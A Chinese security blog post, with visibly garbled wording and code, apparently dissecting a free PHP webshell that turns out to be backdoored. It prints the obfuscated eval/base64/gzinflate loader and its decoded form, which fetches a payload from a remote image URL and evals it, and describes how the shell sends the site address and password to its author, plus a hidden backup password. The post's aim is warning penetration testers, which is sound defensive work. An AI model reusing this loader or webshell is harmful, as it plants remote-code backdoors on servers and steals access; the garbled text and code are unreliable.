彷佛便是这个网站,进去之后看看先容,觉得好高大上玄色的背景合营绿色,灰白色的界面,这不正是小白们心里的标配马吗?好的,便是这匹宝马了。

不知道这宝马有木有先容的那么好,竟然能过统统waf,诸多安全软件都免杀。
有如此良驹,在渗透的时候一定是过五关斩六将。
小明的手抖动的移动鼠标到底部,看到下载地址,狠狠的点击一下,只听得叮的一声,马儿就掉到了自己的目录里面,

迫不及待的解压之后,看到一个shell.php,大小只有1.83KB,这体重和小马有的一拼了。

php后门检测PHP WebShell代码后门的一次检讨 Java

<?php $password='xxxxx';//登录密码 //本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色:PHP高版本低版本都能实行,文件短小精悍,方便上传,功能强大,提权无痕迹,忽略waf,过安全狗、云锁、360、阿里云、护卫神等主流waf。
同时支持菜刀、xise连接。
$html='$password'.'='.\"大众'\"大众.$password.\"大众';\公众.'@e#html'.''.'v'.\"大众\公众.''.''.\公众\公众.''.''.''.'a'.''.'l('.'g'.''.\公众\"大众.''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''.\"大众\"大众.'a'.'t'.'e(b'.'as'.''.''.''.\"大众\"大众.''.'e'.'6'.''.\"大众\"大众.''.\公众\"大众.\公众\"大众.\公众\公众.''.'4_'.'d'.'e'.'c'.''.''.''.\公众\公众.''.\"大众\"大众.'o'.'d'.'e'.'('.\公众'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));\"大众;$css=base64_decode(\"大众Q3JlYXRlX0Z1bmN0aW9u\公众);$style=$css('',preg_replace(\公众/#html/\"大众,\"大众\公众,$html));$style();/));.'<linkrel=\"大众stylesheet\公众href=\"大众$#css\"大众/>';/

咋一看这不是base64吗,如此小的代码竟然实现了诸多的功能。
其实让人佩服作者,打开phpstorm直接base64解密得到了下面这段内容

error_reporting(0); session_start(); if (!isset($_SESSION[\"大众phpapi\"大众])) { $c = ''; $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)'; $url = base64_decode(base64_decode(\公众YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg==\"大众)); $urlNew= base64_decode(\公众LzBPbGlha1RIaXNQOGhwMGFkcGg5cGFwaTUrcjZlY2kwYTh5aWptZzlveGNwOWNrdmhmLw==\"大众); if (function_exists('fsockopen')) { $link = parse_url($url); $query = $link['path']; $host = strtolower($link['host']); $fp = fsockopen($host, 80, $errno, $errstr, 10); if ($fp) { $out = \"大众GET /{$query} HTTP/1.0\r\n\"大众; $out .= \"大众Host: {$host}\r\n\公众; $out .= \公众User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n\"大众; $out .= \公众Connection: Close\r\n\r\n\公众; fwrite($fp, $out); $inheader = 1; $contents = \"大众\"大众; while (!feof($fp)) { $line = fgets($fp, 4096); if ($inheader == 0) { $contents .= $line; } if ($inheader && ($line == \"大众\n\"大众 || $line == \"大众\r\n\"大众)) { $inheader = 0; } } fclose($fp); $c = $contents; } } if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); $c = curl_exec($ch); curl_close($ch); } if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) { $temps = @file($url); if (!empty($temps)) $c = @implode('', $temps); if (!strpos($c, \"大众delDirAndFile\"大众)) $c = @file_get_contents($url); } if (strpos($c, $urlNew) !== false) { $c = str_replace($urlNew, \"大众\公众, $c); $_SESSION[\"大众phpapi\"大众] = gzinflate(base64_decode($c)); } } if (isset($_SESSION[\"大众phpapi\"大众])) { eval($_SESSION[\公众phpapi\"大众]); }

原来作者是通过远程下载图片的办法得到大马的内容,难怪可以逃过免杀啊,根本便是普通的php代码,这样以来作者就可以明正言顺的得到我们的url了,真的是躺着也能乐呵呵的数马儿,今年又是一个丰收年啊。

$url = base64_decode(base64_decode(\公众YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg==\公众)); $url base64解开后的到http://xxx.xxx/404.gif在得到图片的内容后用base64解开然后zip解压我们得到了真的马儿,打开浏览器后一看果真和网站上先容的是一个样子容貌的。
输入密码上岸后,看到这样的马儿用起来才叫爽啊,

为了看看大马儿的内部还有什么手段,祭出Firefox,按下f12,输入密码后查看网络连接,创造视乎没有什么其他的外部活动,js也是非常的安静。
新想这马儿该当是安全的。
再次查看了httpnetworksniff和TcpLogView,没有外部的连接活动。
但还是非常不放心,在phpstorm里面看了下base64加密的字符串,看到一个函数非常可疑

个中htmlogin()函数内部 if (strpos($domain, “0.0″) !== false || strpos($domain, “192.168.”) !== false || strpos($domain, “localhost”) !== false) 以及show_mainp()函数都对局域网ip特色做了判断,判断了是否为局域网,不然就发送你的地址和密码到他的网站,http://xx.xx/api.php?name=filename.php&value=password&id=ip

然而到此结束了吗???常日WebShell会有一个备用的密码,征采了一下postpass 在1709行创造了备用密码if ($_POST['postpass'] == postpass||$_POST['postpass']==’http200ok’)

总结:

还是那句话江湖险恶,不要轻易的用别人写好加密的东西,很多软件最好翻墙或者先去github上找找。
webshell这种东西要自己动手查看内容确定安全后才能放心利用。

本文原创作者:facebook001,属FreeBuf原创褒奖操持,未经容许禁止转载